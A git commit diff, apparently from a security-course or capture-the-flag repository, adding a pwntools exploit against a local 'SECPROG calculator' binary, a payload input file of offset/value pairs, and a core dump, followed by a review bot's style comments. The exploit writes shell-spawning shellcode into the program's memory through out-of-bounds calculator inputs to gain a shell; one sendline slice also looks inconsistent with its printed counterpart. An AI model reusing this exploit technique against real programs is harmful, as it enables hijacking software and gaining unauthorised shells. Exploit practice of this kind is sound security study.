-rwxr-xr-x | bruh.py | 5 | ||||
-rw-r--r-- | calc.i64 | bin | 8368587 -> 8368587 bytes | |||
-rw-r--r-- | core | bin | 0 -> 983040 bytes | |||
-rwxr-xr-x | exploit.py | 26 | ||||
-rw-r--r-- | sout | 1 | ||||
-rw-r--r-- | stest | 16 |
6 files changed, 41 insertions, 7 deletions
diff --git a/bruh.py b/bruh.py
deleted file mode 100755
index ca71230..0000000
--- a/bruh.py
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/usr/bin/env python3
-for x in range(147460):
- print("99", end='')
-print("")
-
Binary files differ
Binary files differ
diff --git a/exploit.py b/exploit.py
new file mode 100755
index 0000000..b765e85
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+from pwn import *
+
+
+context.binary = './calc'
+
+shellcode = asm(shellcraft.sh())
+
+pid = process("./calc")
+
+print(shellcode.hex())
+print(context)
+
+shellen = len(shellcode)
+
+for exec_num,offset in enumerate(reversed(range(361, int(len(shellcode) / 4) + 361))):
+ pid.sendline("+{}+{}".format(offset, int.from_bytes(shellcode[((exec_num + 1) * 1):(exec_num * 4)], 'big')))
+ print("+{}+{}".format(offset, int.from_bytes(shellcode[shellen - ((exec_num + 1) * 4):shellen - (exec_num * 4)], 'big')))
+
+
+pid.sendline("+360+135151459")
+print("+360+135151459")
+#pid.interactive()
+
+print(pid.recv())
+
@@ -0,0 +1 @@
+=== Welcome to SECPROG calculator ===
@@ -1,2 +1,14 @@
--7+1234
--8+134517012
++371+795371626
++370+1752379183
++369+1852400175
++368+23651209
++367+2164326657
++366+1769088052
++365+3375431937
++364+1493461585
++363+2303844609
++362+1792160225
++361+2160941067
++360+135151459
+bruh
+
|
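Review bot: In the new exploit.py the name `pid` holds the tube returned by `process("./calc")`, not a process id, and that misleads every later line that calls `pid.sendline`/`pid.recv`; rename it, e.g. `io = process("./calc")`. The loop bound `int(len(shellcode) / 4)` is a float round-trip where integer division is meant, so prefer `len(shellcode) // 4`, and the commented-out `#pid.interactive()` plus the `print(context)` debug line should be removed or guarded behind a verbosity flag rather than left in a committed script. The `from pwn import *` star import is pwntools convention but it shadows stdlib names such as `struct` and `os`; if the file grows, switch to `from pwn import asm, shellcraft, process, context`. Separately, the same commit adds a 983040-byte `core` dump and the `calc.i64` database as binaries; a core dump is a snapshot of process memory and an environment-specific artefact that belongs in `.gitignore`, not in version control.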